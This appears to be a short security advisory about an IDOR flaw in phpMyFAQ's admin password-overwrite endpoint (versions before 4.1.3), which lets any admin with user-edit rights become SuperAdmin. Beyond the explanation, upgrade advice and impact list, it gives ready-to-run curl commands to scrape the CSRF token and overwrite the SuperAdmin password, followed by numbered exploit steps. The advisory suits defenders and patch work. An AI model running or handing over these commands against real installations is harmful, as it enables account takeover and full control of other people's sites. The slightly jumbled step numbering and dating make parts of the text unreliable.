Listen to this Post
How the CVE Works
The vulnerability exists in the `overwritePassword()` method of phpMyFAQ’s Admin API.
The endpoint is accessible at `/admin/api/user/overwrite-password` via a PUT request.
It is intended to allow admins with `USER_EDIT` permission to change a user’s password.
However, the method does not verify that the requesting admin is authorized to modify the target user.
The `userId` parameter is taken directly from the request body without any ownership or privilege check.
An attacker with a low-privilege admin account can modify this `userId` value.
By setting `userId` to `1` (the SuperAdmin account), the attacker can overwrite the SuperAdmin’s password.
No validation ensures that the target user has equal or lower privileges than the attacker.
A valid CSRF token is still required, but it can be extracted from any admin page.
The attack bypasses all authorization logic because the code never checks if the admin should be able to manage the target user.
This flaw effectively removes any privilege separation among admin accounts.
Any admin user can instantly escalate to full SuperAdmin control.
The vulnerable code resides in `UserController.php` lines 232–271.
No multi-factor confirmation or additional checks are performed for such a sensitive action.
The attack complexity is low, requiring only a valid admin session with `USER_EDIT` permission.
dailycve form
Platform: phpMyFAQ
Version: <4.1.3
Vulnerability: IDOR
Severity: High
date: 2026-05-20
Prediction: Patch 2026-05-18
Analytics under What Undercode Say:
Extract CSRF token from admin page curl -sL -b "PHPSESSID=admin_session" http://target/admin/index.php | grep -oP 'pmf-csrf-token.?value="\K[^"]+'
Change SuperAdmin password via IDOR
curl -X PUT -H "Content-Type: application/json" \
-b "PHPSESSID=admin_session" \
-d '{
"userId": 1,
"csrf": "admin_csrf_token_value",
"newPassword": "NewSuperAdminP@ss123!",
"passwordRepeat": "NewSuperAdminP@ss123!"
}' \
http://target/admin/api/user/overwrite-password
Exploit:
1. Obtain a low-privilege admin session.
2. Extract CSRF token from any admin page.
- Send PUT request to `/admin/api/user/overwrite-password` with
"userId": 1.
4. Receive success response.
- Log in as SuperAdmin with the new password.
Protection from this CVE
Upgrade to phpMyFAQ version 4.1.3 or later.
If upgrade is not possible, restrict network access to the admin API and enforce strict role-based access controls manually.
Impact
Privilege escalation from any admin user to SuperAdmin.
Full takeover of the phpMyFAQ instance, including access to all data, configuration, and user accounts.
Complete breakdown of multi-admin privilege separation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

